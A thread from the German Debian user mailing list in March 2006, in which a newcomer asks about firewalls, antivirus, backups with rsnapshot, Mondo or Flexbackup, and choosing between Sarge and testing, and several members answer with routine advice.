-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Andreas Pakulat schrieb: Hi Andreas! > Naja, wenn du aber einen neuen Rechner aufsetzt nimm bitte Sarge, > wenn du hier und da doch was neueres _unbedingt_ brauchst weil da ein > Feature drin ist ohne das du nicht leben kannst such dir einen Backport, > www.backports.org ist da eine gute Anlaufstelle - dort gibts > hochqualitative Backports. Also ich weiß nicht was es immer gegen Unstable und Testing gibt. Ich habe vor 1 1/2 Jahren mit Linux angefangen und nachdem ich 2 Tage Suse getestet hatte, habe ich Debian SID installiert. Ich hatte nie große Probleme mit meinem Linux und es läuft seit dieser Zeit sehr stabil. OK, hin und wieder gibt es nach nem update das ein oder andere Problem. Ich hatte aber noch nie welche, die nicht innerhalb kürzester Zeit zu lösen waren. Deshalb sehe ich keinen Grund für ein Desktopsystem Testing oder Unstable zu nutzen. Und wenn es doch einmal Probleme gibt hat jeder user dem seine Daten wichtig sind entsprechende Sicherungen... ;-) > Andreas Gruß Stephen -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFEJWpm8erSf/+MCZQRAtDJAKC15nhz7cvvR02qYG5YLfN+WIJgfgCcDgDt 8t4wMQyAfQGbJn1jMwe46QY= =fBGF -END PGP SIGNATURE- -- Haeufig gestellte Fragen und Antworten (FAQ): http://www.de.debian.org/debian-user-german-FAQ/ Zum AUSTRAGEN schicken Sie eine Mail an [EMAIL PROTECTED] mit dem Subject "unsubscribe". Probleme? Mail an [EMAIL PROTECTED] (engl)
Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
Am Freitag, 24. März 2006 00:50 schrieb Matthias Haegele: > [...] > > 1.) Brauche ich hinter der Firewall des Routers noch eine weitere > > Firewall, bei Windows XP war die ja fast ein Muss. Wenn ja, ... > > Wenn der Router "nat-et" und die FW soweit funktioniert imho für einen > Desktop-PC nicht, solange du keine Dienste ins "Böse Internet" anbietest > ... Moment mal. Ich habe einen Server, der nicht hinter einer Firewall sitzt (virtueller Server, gemietet) und als Server natürlich auch Dienste ins Internet anbietet. Ich wollte damals bei der Einrichtung iptables-Regeln mit Connection Tracking einrichten, musste aber feststellen, dass das Connection-Tracking-Modul nicht verfügbar war und ich, weil es ein virtueller Server ist, dieses auch nicht nachinstallieren/-laden konnte. Damals erkundigte ich mich auf dieser Liste, was ich am besten machen sollte, und mir wurde gesagt, dass es unsinnig ist, Zugriffe auf Ports, die sowieso nicht offen sind, noch durch einen Filter zu verhindern. Und die offenen Ports will ich ja nicht blockieren. Mit anderen Worten: auf einem Server, der direkt mit dem Internet verbunden ist, braucht man keinen Paketfilter. (So habe ich das jedenfalls verstanden.) Welche Bedeutung soll nun aber eine Firewall noch haben? Was sollte man auf dem Server in dieser Richtung einrichten, was nicht? > [...] Viele Grüße Wolfgang
Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
On 24.03.06 20:05:34, Andrea Bayer wrote: > Am Freitag, 24. März 2006 18:09 schrieb Andreas Pakulat: > > Es kann hier und > > da Probleme dabei geben, i.A. sind aber solche Upgrades von Debian > > getestet und es gibt Support (auch hier) dafür wenn was nicht klappt. > > Wenn jemand Murks gebaut hat, seit ich Debian probiere, dann war das bislang > eindeutig ich. Aber gelernt hab ich dadurch immerhin, was ich besser bleiben > lasse *g* Ja, am ehesten lernt man durch Fehler, IMHO. > > Naja, wenn du aber einen neuen Rechner aufsetzt nimm bitte Sarge, > > wenn du hier und da doch was neueres _unbedingt_ brauchst weil da ein > > Feature drin ist ohne das du nicht leben kannst such dir einen Backport, > > www.backports.org ist da eine gute Anlaufstelle - dort gibts > > hochqualitative Backports. > > Muss ich mir auch anschauen. Ich seh schon, dass wird wieder eine Nachttour. Naja, da gehste du hin guckst dir in der FAQ an wie man die Eintraege in der sources.list und das APT-Pinning dafuer macht und gut ist. Gleich noch ne Warnung: Das ist _ausschliesslich_ fuer Sarge, die Pakete dort funktionieren im Normalfall nicht unter Etch oder Sid. Was mich wirklich erstaunt ist der immense Aufwand der da betrieben wird. Man findet z.B. bei OOo im changelog aus unstable Eintraege ala "kleine Aenderung hier und da um den Backport zu vereinfachen". bpo ist mittlerweile ein richtiges eigenes Projekt, habe ich den Eindruck. Andreas -- You'll be sorry... -- Haeufig gestellte Fragen und Antworten (FAQ): http://www.de.debian.org/debian-user-german-FAQ/ Zum AUSTRAGEN schicken Sie eine Mail an [EMAIL PROTECTED] mit dem Subject "unsubscribe". Probleme? Mail an [EMAIL PROTECTED] (engl)
Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
On 24.03.06 19:09:38, Andrea Bayer wrote: > > Verstehe ich auch irgendwie nicht. Ausser du meinst tasksel. Wobei ich > > aber finde dass das viel zu viel installiert pro Task. > > Nee, tasksel will ich nicht, das schmeißt mich ja zu. Hab auch nur kde-base > installiert und den Rest, den ich will, den hol ich mir lieber einzeln. Gibt > es eigentlich irgendwelche Bedenken gegenüber deborphan und debfoster. Ich > hab nicht gern totes Zeug auf'm Rechner, war da schon unter Windows immer > aktiv. Noe warum sollte es die geben. Persoenlich raeume ich aber lieber hin und wieder "zu Fuss" auf. Dauert zwar so 2 Stunden, aber debfoster durchzugehen dauert ja auch... > > > > Persönlich sichere ich einfach mittels rsync/rsnapshot auf ... > > > > > > Hm würde mir besser gefallen. Ginge dies denn statt eines anderen > > > Rechners auch mit einer eigenen Partition. > > > > Ja. > > Das gefällt mir. Ach und noch was was dir gefallen wird: rsnapshot sichert nur die Aenderungen und nutzt dabei Hardlinks. So hast du 2 Verzeichnisbaeume die exakt die gesicherten Verzeichnisse darstellen, aber alle Dateien die in beiden baeumen gleich sind belegen nur einmal Platz. > > Es laesst sich eine Liste von Ordnern erstellen, zusätzlich kann man bei > > rsnapshot auch noch Skripte angeben die ausgeführt werden und z.B. einen > > Datenbank-Dump erzeugen der dann mitgesichert wird. > > Was ist ein Datenbank-Dump, eine Sicherung der Backend-Daten? Eine Reintextrepraesentation der Daten in der Datenbank und ihrer Struktur. > > Der einzige Grund Xorg >= 6.9 einzusetzen der mir einfaellt ist das > > der Treiber von Ati mehr der neueren Grafikkarten unterstützt. > > Was dann für meinen Laptop gut sein könnte. Naja, ich wuerd trotzdem raten erstmal Sarge zu installieren und zu schauen ob 2D nicht doch geht. Wenn nicht kannst du immernoch nen Xorg Backport von www.backports.org installieren (oder notfalls auf testing/unstable upgraden) > > Ja, soo schlimm ist das nicht (mehr). > > Da war ich allerdings auch mehr als angenehm überrascht, sah mich schon in > Konfigs herumkritzeln, aber brauchte ich nicht außer dem Üblichen wie > Rechner-IP, VK usw. Hmm, also hier mit WEP trag ich immer noch den Key und die ESSID in die Config. WPA wuerde aehnlich aussehen. GUI's mag ich da nicht, weil die sich meistens nicht mit den debianspezifischen Netzwerkkonfigs nicht "vertragen". Andreas -- This will be a memorable month -- no matter how hard you try to forget it. -- Haeufig gestellte Fragen und Antworten (FAQ): http://www.de.debian.org/debian-user-german-FAQ/ Zum AUSTRAGEN schicken Sie eine Mail an [EMAIL PROTECTED] mit dem Subject "unsubscribe". Probleme? Mail an [EMAIL PROTECTED] (engl)
Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
Hallo Ralf, > Wenn es nicht Tasksel ist, dann versuch mal in Aptitude die Funktion "neuen > Kategorie Browser" Das sollte es Dir so darstellen wie Du es wünscht. > Zu finden über -> Ansichten Hab ich tatsächlich noch nicht ausprobiert, entspricht das nicht Synaptic in der Darstellung. Ich gucke aber erst. Gruß von Köln nach Köln ;) Andrea
Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
Am Freitag, 24. März 2006 18:09 schrieb Andreas Pakulat: > Noe, liegts damit gar nicht so falsch. Allerdings gibts einen wichtigen > Unterschied, WM+X11 sind nicht ans OS gekoppelt und so kannst du alle 3 > Teile einzeln erneuern. Das ist ja auch schon was, ich hab nämlich Windows nie über die Vorversion drüber installiert, trotz des damit verbundenen Aufwands, um damit in einem auch Unnötiges los zu werden. > Es kann hier und > da Probleme dabei geben, i.A. sind aber solche Upgrades von Debian > getestet und es gibt Support (auch hier) dafür wenn was nicht klappt. Wenn jemand Murks gebaut hat, seit ich Debian probiere, dann war das bislang eindeutig ich. Aber gelernt hab ich dadurch immerhin, was ich besser bleiben lasse *g* > Naja, wenn du aber einen neuen Rechner aufsetzt nimm bitte Sarge, > wenn du hier und da doch was neueres _unbedingt_ brauchst weil da ein > Feature drin ist ohne das du nicht leben kannst such dir einen Backport, > www.backports.org ist da eine gute Anlaufstelle - dort gibts > hochqualitative Backports. Muss ich mir auch anschauen. Ich seh schon, dass wird wieder eine Nachttour. > Die Frage ist wozu. Leg dein Backup so ab, dass du mit > "Standardmitteln" wie cp, tar, gzip, rsync, partimage, dd usw. drauf > zugreifen kannst. Dann musst du nur irgendeine Live-CD ins Laufwerk > schieben, das Teil booten und du hast deine Tools die du zum Recovery > brauchst. Das klingt logisch und für meine eine realisierbar. Ich les jetzt hier noch was und dann hab ich erst mal genug Anregungen nachzuverfolgen. Ganz lieben Dank so zwischendurch, auch an die, denen ich nicht antworte, weil dann vieles nur doppelt wäre, was ich antworten könnte. Andrea
Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
Guten Abend Andreas, > Verstehe ich auch irgendwie nicht. Ausser du meinst tasksel. Wobei ich > aber finde dass das viel zu viel installiert pro Task. Nee, tasksel will ich nicht, das schmeißt mich ja zu. Hab auch nur kde-base installiert und den Rest, den ich will, den hol ich mir lieber einzeln. Gibt es eigentlich irgendwelche Bedenken gegenüber deborphan und debfoster. Ich hab nicht gern totes Zeug auf'm Rechner, war da schon unter Windows immer aktiv. > > > Persönlich sichere ich einfach mittels rsync/rsnapshot auf ... > > > > Hm würde mir besser gefallen. Ginge dies denn statt eines anderen > > Rechners auch mit einer eigenen Partition. > > Ja. Das gefällt mir. > Es laesst sich eine Liste von Ordnern erstellen, zusätzlich kann man bei > rsnapshot auch noch Skripte angeben die ausgeführt werden und z.B. einen > Datenbank-Dump erzeugen der dann mitgesichert wird. Was ist ein Datenbank-Dump, eine Sicherung der Backend-Daten? > Der einzige Grund Xorg >= 6.9 einzusetzen der mir einfaellt ist das > der Treiber von Ati mehr der neueren Grafikkarten unterstützt. Was dann für meinen Laptop gut sein könnte. > Ja, soo schlimm ist das nicht (mehr). Da war ich allerdings auch mehr als angenehm überrascht, sah mich schon in Konfigs herumkritzeln, aber brauchte ich nicht außer dem Üblichen wie Rechner-IP, VK usw. Gruß Andrea
Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
Hallo Claus, > Ich mache mein Backup vom System mit Mondo, dabei lasse ich die > Partitionen zur Datenspeicherung (File-Server) aus. Somit habe ich ein > Backup vom System selbst (bootfähig usw.). Und woher weiß mein Rechner dann, dass er beispielsweise von der Partition /bckp (so heißt die von mir angedachte) booten soll? Indem ich das in Grub eintrage? Da fällt mir gerade ein, es hat mich noch etwas an mondo irritiert. Ich hatte extra angegeben, dass die Partition /windows ausgeschlossen werden soll, hab sogar einen Versuch mit einem Verzeichnis unter /windows als auszuschließen probiert. mondo hat aber wacker /windows - egal wie - integriert. Wo ist der Haken? > Mit Flexbackup sichere ich den File-Server. Die Backups mit Flexbackup > werden auf einen NFS-Share geschoben. Flexbackup hat den Vorteil, dass > es inkrementelle, differentielle und volle Backups erstellt. Nach Datum > und Art sind diese dann benannt. Muss die Partition /bckp irgendeine Kennzeichnung erhalten, um als Fileserver identifiziert zu werden? ... und eh ich Euch Löcher in den Bauch frage, gehe ich mal nach NFS-Share googeln. > Diese Backups könnten z.B auch auf eine externe (USB-) Platte > kopiert/verschoben oder auf ein Bandlaufwerk geschrieben werden. Interessant, da ich überlege, mir eine neue externe HD zuzulegen, ein Kurzschluss hatte meine zerlegt, war aber schon praktisch. Gruß Andrea
Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
Am Freitag, 24. März 2006 01:39 schrieb Jan Kohnert: > > Wenn dann nimm einen FW-Builder o.ä. wenn du wenig Erfahrung damit hast. > > Ich kann da Shorewall empfehlen. Aber nimm einen aktuellen Release, der von > sarge ist AFAIK mittlerweile wieder veraltet... > > > ... > > Kannste kostenlos clamav nehmen, Die Firewall spar ich mir mal, da ich keine Dienste anbiete, clamav hab ich schon markiert :) Gruß Andrea
Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
Am Freitag, 24. März 2006 00:55 schrieb Matthias Haegele: > > Es gab doch da mal so ein Paket "Popularity Contest" o. ä., einfach > > fragen je nach Einsatzzweck gibt es meist mehrere gute Tools, apt-cache > > search oder aptitude hilft auch manchmal ... > > Grad nochmal nachgeschaut, da kann man dann nach Bereichen die am > häufigsten installierten Programme ansehen ob die "Untermenge" die > popularity-contest einsetzen, relevant ist k.A.: Danke Matthias, ich geh mal gucken. Gruß Andrea
Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
Am Freitag 24 März 2006 17:48 schrieb Ralf Schmidt: > Wenn es nicht Tasksel ist, dann versuch mal in Aptitude die Funktion > "neuen Kategorie Browser" Das sollte es Dir so darstellen wie Du es > wünscht. Zu finden über -> Ansichten Auch wenn ich nicht danach gefragt hatte.. das is ja klasse... danke für den Tipp. Gruß Chris -- A: because it distrupts the normal process of thought Q: why is top posting frowned upon
Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
Hallo Andrea, Am Fri, 24 Mar 2006 15:36:38 +0100 schrieb Andrea Bayer: > Nun bin ich salonfähig ;). Jepp. > vermutlich bin ich noch zu windows-geprägt. Etch wird ja xorg und nicht > mehr xfree enthalten, deswegen will ich kein aussterbendes System bauen, > weil ich mir die Komination von x-window-server + xorg/xfree vorstelle > wie den Unterschied von Win98 auf WinXP, vermutlich lieg ich damit > falsch. Ich bleib jetzt bei der testing-Version und werde nicht updaten, > was stabil läuft und bislang habe ich nirgendwo Probleme. Du liegst falsch. Ging mir zu Anfang auch so. > Nee, das ist es nicht. Es soll so sein, dass sich die bereits vorhanden > Kategorien verfeinern lassen, z.B. Oberkategorie "Multimedia" > Unterkategorien "Audioplayer", "Videoplayer", "Audi-Tools" usw. Das > gibt's, ich geh in einer ruhigen Minute noch mal forschen. Wenn es nicht Tasksel ist, dann versuch mal in Aptitude die Funktion "neuen Kategorie Browser" Das sollte es Dir so darstellen wie Du es wünscht. Zu finden über -> Ansichten HTH Viele Grüße aus Köln Ralf Schmidt -- Signatur ist in Urlaub -- Haeufig gestellte Fragen und Antworten (FAQ): http://www.de.debian.org/debian-user-german-FAQ/ Zum AUSTRAGEN schicken Sie eine Mail an [EMAIL PROTECTED] mit dem Subject "unsubscribe". Probleme? Mail an [EMAIL PROTECTED] (engl)
Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
On 24.03.06 15:36:38, Andrea Bayer wrote: > Am Freitag, 24. März 2006 09:56 schrieb Christian Frommeyer: > Nun bin ich salonfähig ;). Jupp. > vermutlich bin ich noch zu windows-geprägt. Etch wird ja xorg und nicht mehr > xfree enthalten, deswegen will ich kein aussterbendes System bauen, weil ich > mir die Komination von x-window-server + xorg/xfree vorstelle wie den > Unterschied von Win98 auf WinXP, vermutlich lieg ich damit falsch. Noe, liegts damit gar nicht so falsch. Allerdings gibts einen wichtigen Unterschied, WM+X11 sind nicht ans OS gekoppelt und so kannst du alle 3 Teile einzeln erneuern. Weiterhin: Wenn du Sarge installiert haettest könntest du relativ gefahrlos beim Release von Etch auf dieses upgraden. Da wird _keine_ Neuinstallation wie beim Wechsel von 98 auf XP faellig. Es kann hier und da Probleme dabei geben, i.A. sind aber solche Upgrades von Debian getestet und es gibt Support (auch hier) dafür wenn was nicht klappt. > Ich bleib > jetzt bei der testing-Version und werde nicht updaten, was stabil läuft und > bislang habe ich nirgendwo Probleme. Naja, wenn du aber einen neuen Rechner aufsetzt nimm bitte Sarge, wenn du hier und da doch was neueres _unbedingt_ brauchst weil da ein Feature drin ist ohne das du nicht leben kannst such dir einen Backport, www.backports.org ist da eine gute Anlaufstelle - dort gibts hochqualitative Backports. > > > Das geht? Damit werde ich mich befassen. > > > > Wenn der Rechner von CD booten kann, kannst Du ohne weiteres eine > > Live-CD als Rettungssystem verwenden (d.h. natürlich nur, wenn Du nicht > > über dasselbe CD-Laufwerk das Backup einspielen willst). > > Das Problem ist, dass es hier der Brenner nicht mehr tut, hat nichts mit > Linux > zu tun, der hatte bereits unter Windows, das Zeitliche gesegnet. Und ich > werde kaum auf völlig anderen Rechnern auch noch mit mit WLAN eine Boot-CD > erstellen können, die diesen Rechner wieder richtig hochfährt, oder? Die Frage ist wozu. Leg dein Backup so ab, dass du mit "Standardmitteln" wie cp, tar, gzip, rsync, partimage, dd usw. drauf zugreifen kannst. Dann musst du nur irgendeine Live-CD ins Laufwerk schieben, das Teil booten und du hast deine Tools die du zum Recovery brauchst. Andreas -- You're currently going through a difficult transition period called "Life." -- Haeufig gestellte Fragen und Antworten (FAQ): http://www.de.debian.org/debian-user-german-FAQ/ Zum AUSTRAGEN schicken Sie eine Mail an [EMAIL PROTECTED] mit dem Subject "unsubscribe". Probleme? Mail an [EMAIL PROTECTED] (engl)
Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
Hallo Andrea, hallo Bernd, [...] >> 3.) Ich brauche ein Programm, mit dem ich eine 1.4 MB große Bootdisk >> erstellen >> kann, über die sich Backups des Systems auf einer gesonderten Partition >> aufrufen lassen, um zur Not auch das gesamte System wieder herstellen zu >> können. Optimal wäre, wenn dieses Programm Änderungen aufzeichnete, so dass >> ich steuern kann, welches Backup zurückzuspielen wäre, ähnlich der >> Systemwiederherstellung unter Windows. > > Huch Disketten? Flexbackup wäre eine Möglichkeit. Dar vielleicht auch > noch. Aber mit Flexbackup bekommt sie doch keine Bootdisk erstellt, oder? Also Flexbackup ist ein wirklich gutes Backup Programm. Ich mache mein Backup vom System mit Mondo, dabei lasse ich die Partitionen zur Datenspeicherung (File-Server) aus. Somit habe ich ein Backup vom System selbst (bootfähig usw.). Mit Flexbackup sichere ich den File-Server. Die Backups mit Flexbackup werden auf einen NFS-Share geschoben. Flexbackup hat den Vorteil, dass es inkrementelle, differentielle und volle Backups erstellt. Nach Datum und Art sind diese dann benannt. Diese Backups könnten z.B auch auf eine externe (USB-) Platte kopiert/verschoben oder auf ein Bandlaufwerk geschrieben werden. > Gruß MfG, Claus -- Claus Malter GnuPG-ID: 0x08B86210 http://wwwkeys.de.pgp.net -- Haeufig gestellte Fragen und Antworten (FAQ): http://www.de.debian.org/debian-user-german-FAQ/ Zum AUSTRAGEN schicken Sie eine Mail an [EMAIL PROTECTED] mit dem Subject "unsubscribe". Probleme? Mail an [EMAIL PROTECTED] (engl)
Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
On 24.03.06 16:01:12, Andrea Bayer wrote: > Am Freitag, 24. März 2006 09:54 schrieb Andreas Pakulat: > > > Das verstehe ich jetzt nicht ganz. Die Anzeige und Kategorisierung in > > synaptic oder aptitude hat nichts damit zu tun wo du Dokumentation > > findest. Sobald du Paket X aus welcher Kategorie (z.B. documentation) > > installierst ist ein Teil der dazugehörigen Dokumentation in > > /usr/share/doc/X/, dazu gehören neben den changelogs auch eine > > README.Debian die debianspezifische Eigenheiten erklärt sowie sämtliche > > README und anderen Dokumente die vom Original-Author mitgeliefert > > wurden. > > Vermutlich hab ich das ungeschickt ausgedrückt. Mir geht es um eine feinere > Vorauswahl herunterladbarer Pakete. Sobald ich dieses Programm wieder > aufgestöbert habe, geb ich's bekannt. Verstehe ich auch irgendwie nicht. Ausser du meinst tasksel. Wobei ich aber finde dass das viel zu viel installiert pro Task. > > Persönlich sichere ich einfach mittels rsync/rsnapshot auf einen anderen > > Rechner. Damit hab ich nicht das Problem das irgendein "Archiv" kaputt > > gehen kann und ich kann jederzeit auf die Daten zugreifen. Natürlich > > braucht man dann mehr Platz... > > Hm würde mir besser gefallen. Ginge dies denn statt eines anderen Rechners > auch mit einer eigenen Partition. Ja. > wenn ich beispielsweise mit Knoppix > hochgefahren bin? Ist nicht unbedingt notwendig, ich lasse das hier immer nachts laufen, da aendern sich die zu sichernden Dateien auch kaum/gar nicht und ich muss nicht extra was anderes booten oder den Runlevel wechseln. > Lassen sich die Partitionen angeben, die außen vor bleiben > sollen? Es laesst sich eine Liste von Ordnern erstellen, zusätzlich kann man bei rsnapshot auch noch Skripte angeben die ausgeführt werden und z.B. einen Datenbank-Dump erzeugen der dann mitgesichert wird. > > Wozu brauchst du auf der Kiste Xorg? > > Ich denke vermutlich noch zu windowslastig, weil xfree ab Etch unter den > Tisch > fällt, wollte ich es nicht haben *g* XFree86 4.3 laeuft auf vielen Rechnern tadellos. Klaro es kann keine Fensterschatten oder durchsichtigen Fenster "nativ", aber das schafft eh kaum eine Grafikkarte in annehmbarer Geschwindigkeit und so bleibts nur ne Spielerei. Der einzige Grund Xorg >= 6.9 einzusetzen der mir einfaellt ist das der Treiber von Ati mehr der neueren Grafikkarten unterstützt. > > > > > Pentium III 128MB, PCI > > Ahso. > > Kommt noch dazu, dass die anderen Rechner wireless sind, war mir zu happig > für > den Anfang. Hab's aber inzwischen schon bei meinem Sohn getestet und es hat > geklappt. Ja, soo schlimm ist das nicht (mehr). Andreas -- You have Egyptian flu: you're going to be a mummy. -- Haeufig gestellte Fragen und Antworten (FAQ): http://www.de.debian.org/debian-user-german-FAQ/ Zum AUSTRAGEN schicken Sie eine Mail an [EMAIL PROTECTED] mit dem Subject "unsubscribe". Probleme? Mail an [EMAIL PROTECTED] (engl)
Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
Am Freitag, 24. März 2006 09:54 schrieb Andreas Pakulat: > Das verstehe ich jetzt nicht ganz. Die Anzeige und Kategorisierung in > synaptic oder aptitude hat nichts damit zu tun wo du Dokumentation > findest. Sobald du Paket X aus welcher Kategorie (z.B. documentation) > installierst ist ein Teil der dazugehörigen Dokumentation in > /usr/share/doc/X/, dazu gehören neben den changelogs auch eine > README.Debian die debianspezifische Eigenheiten erklärt sowie sämtliche > README und anderen Dokumente die vom Original-Author mitgeliefert > wurden. Vermutlich hab ich das ungeschickt ausgedrückt. Mir geht es um eine feinere Vorauswahl herunterladbarer Pakete. Sobald ich dieses Programm wieder aufgestöbert habe, geb ich's bekannt. > Persönlich sichere ich einfach mittels rsync/rsnapshot auf einen anderen > Rechner. Damit hab ich nicht das Problem das irgendein "Archiv" kaputt > gehen kann und ich kann jederzeit auf die Daten zugreifen. Natürlich > braucht man dann mehr Platz... Hm würde mir besser gefallen. Ginge dies denn statt eines anderen Rechners auch mit einer eigenen Partition. wenn ich beispielsweise mit Knoppix hochgefahren bin? Lassen sich die Partitionen angeben, die außen vor bleiben sollen? 50 GB Windows-Archiv will ich z.B. nicht sichern, weil nicht notwendig. > Wozu brauchst du auf der Kiste Xorg? Ich denke vermutlich noch zu windowslastig, weil xfree ab Etch unter den Tisch fällt, wollte ich es nicht haben *g* > > > > Pentium III 128MB, PCI > Ahso. Kommt noch dazu, dass die anderen Rechner wireless sind, war mir zu happig für den Anfang. Hab's aber inzwischen schon bei meinem Sohn getestet und es hat geklappt. > Dat kommt drauf an. Wenn du mit Linux Emails empfängst die anschliessend > auf einem Windowssystem gelesen werden sollen (also quasi nen Mailserver > betreibst) dann solltest du definitiv einen Virenscanner drüberjagen. Ich hoffe eigentlich, dass ich Windows und MS überhaupt irgendwann völlig kicken kann, nicht nur, dass es nervt, die Preise sind völlig überzogen, wenn ich immer noch WordPerfect unter DOS als weitaus mächtiger, schneller und besser als Word finde. Ein Programm soll tun, was ich will und nicht irgendwelchen Schnickschnack, den ich überhaupt nicht angefordert habe. > Weiterhin wird oft angeführt, dass man unter Linux eigentlich immer > einen unpriveligierten Account benutzt zum arbeiten. Demzufolge > verlierst du eigentlich nur deine eigenen Daten wenn der Virus > zuschlägt... > > Allerdings sollte man auch unter Linux beim Surfen aufpassen, Phishing > und Bugs im Browser gibts auch hier. Ich denke, schaden kann es nicht, denn das Interesse an Linux steigt, wie mir scheint, und dann wird es auch mehr Aufmerksamkeit bei den Idioten finden, die sich bislang an Windows austoben. Danke und Gruß Andrea
Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
Am Freitag, 24. März 2006 09:56 schrieb Christian Frommeyer: > Die Mail kam an, gemeint ist aber weniger die EMail-Adresse, als mehr > der "Freitextteil" davor (Das was Du in KMail bei "Ihr Name" > einträgst). Da sollte einfach Dein Name stehen. Was für eine > EMail-Adresse Du dann verwendest ist Wurst (nur reply-fähig sollte sie > sein). Nun bin ich salonfähig ;). vermutlich bin ich noch zu windows-geprägt. Etch wird ja xorg und nicht mehr xfree enthalten, deswegen will ich kein aussterbendes System bauen, weil ich mir die Komination von x-window-server + xorg/xfree vorstelle wie den Unterschied von Win98 auf WinXP, vermutlich lieg ich damit falsch. Ich bleib jetzt bei der testing-Version und werde nicht updaten, was stabil läuft und bislang habe ich nirgendwo Probleme. > Hmm, ich weiß nicht, was für Kategorien Du meinst, könnte es sein, das > das Programm tasksel heißt? Nee, das ist es nicht. Es soll so sein, dass sich die bereits vorhanden Kategorien verfeinern lassen, z.B. Oberkategorie "Multimedia" Unterkategorien "Audioplayer", "Videoplayer", "Audi-Tools" usw. Das gibt's, ich geh in einer ruhigen Minute noch mal forschen. > > Das geht? Damit werde ich mich befassen. > > Wenn der Rechner von CD booten kann, kannst Du ohne weiteres eine > Live-CD als Rettungssystem verwenden (d.h. natürlich nur, wenn Du nicht > über dasselbe CD-Laufwerk das Backup einspielen willst). Das Problem ist, dass es hier der Brenner nicht mehr tut, hat nichts mit Linux zu tun, der hatte bereits unter Windows, das Zeitliche gesegnet. Und ich werde kaum auf völlig anderen Rechnern auch noch mit mit WLAN eine Boot-CD erstellen können, die diesen Rechner wieder richtig hochfährt, oder? > bist Du darauf angewiesen? XFree86 tat doch auch gut. Ansonsten gilt mit > testing und unstable kann man schon mal kleinere oder größere Probleme > bekommen, weil die Pakete halt schonmal kaputt sein können oder die > Programme böse Bugs haben. Davon hab ich gehört und mir daher die Empfehlung zu Herzen genommen, Updates, Updates sein zu lassen, solange die Programme problemlos laufen. > Ein Anti-Viren-Programm kann nicht schaden und gehört meiner Meinung > nach auch auf jeden Linux-Rechner. Das man bei Linux wesentlich > entspannter mit der Thematik umgehen kann liegt zum einen daran, das es > bislang nur sehr wenige und auch wenig verbreitete Viren für Linux gibt > und zum anderen eben daran, das Linux vom Gesamtkonzept wesentlich > weniger anfällig für Viren ist als Windoof. Ich hab schon unter Windows ein anderes MailProgramm verwendet, das schon früher mehr Einstellungen zuließ als Outlook (ausführbare Skripte usw, blocken, keine HTML-Darstellung), werde also wohl langfristig auf diesem Rechner kein AV-Programm brauchen, aber testen, denn dieser Rechner steht - außer aktuell - vorwiegend ungenutzt herum. Ich hole mir dann mal Clamav. Danke :) und Gruß Andrea
Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
Am Freitag 24 März 2006 08:50 schrieb [EMAIL PROTECTED]: > Dann hoffe ich, dass ich mit meiner Realname-Adresse nun auch in die > Liste komme, sonst muss ich mich vermutlich neu anmelden. Ich > probiere das jetzt mal so ohne. Die Mail kam an, gemeint ist aber weniger die EMail-Adresse, als mehr der "Freitextteil" davor (Das was Du in KMail bei "Ihr Name" einträgst). Da sollte einfach Dein Name stehen. Was für eine EMail-Adresse Du dann verwendest ist Wurst (nur reply-fähig sollte sie sein). > Ich hab leider den Namen vergessen, aber es soll auch ein Programm > geben, dass noch weitere Unterkategorien enthält, als die, die die > z.B. Synaptic anzeigt Hmm, ich weiß nicht, was für Kategorien Du meinst, könnte es sein, das das Programm tasksel heißt? > > Images vom eigenen System kann man z.B. mit dd machen und dann > > später mit einer Knoppix oder anderen Live-CD zurueckspielen. Kein > > Grund für eine Diskette (ausser du hast kein CD-Laufwerk). > > Insbesondere hast du mit einer Live-CD mehr Tools die du nutzen > > kannst... > Das geht? Damit werde ich mich befassen. Wenn der Rechner von CD booten kann, kannst Du ohne weiteres eine Live-CD als Rettungssystem verwenden (d.h. natürlich nur, wenn Du nicht über dasselbe CD-Laufwerk das Backup einspielen willst). > Sarge hat noch kein xorg. Ich werde jedenfalls nicht jedes update > aufspielen, bislang läuft testing ruhig. bist Du darauf angewiesen? XFree86 tat doch auch gut. Ansonsten gilt mit testing und unstable kann man schon mal kleinere oder größere Probleme bekommen, weil die Pakete halt schonmal kaputt sein können oder die Programme böse Bugs haben. > Doch noch eine Frage. Viele halten Antivirensoftware nicht für > notwendig. Ist diese Notwendigkeit nicht bereits durch den > E-Mail-Empfang gegeben? Und wenn nicht, weshalb nicht? Ein Anti-Viren-Programm kann nicht schaden und gehört meiner Meinung nach auch auf jeden Linux-Rechner. Das man bei Linux wesentlich entspannter mit der Thematik umgehen kann liegt zum einen daran, das es bislang nur sehr wenige und auch wenig verbreitete Viren für Linux gibt und zum anderen eben daran, das Linux vom Gesamtkonzept wesentlich weniger anfällig für Viren ist als Windoof. EMails zu empfangen ist an sich völlig harmlos - auch unter Windows. Das Problem ist, das manche Mail-Clients (vor allem Outlock) Code der in Mails vorhanden ist (AcitveX, Attachments, ...) ausführen und das zum Teil ohne den Nutzer zu informieren. Gruß Chris -- A: because it distrupts the normal process of thought Q: why is top posting frowned upon
Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
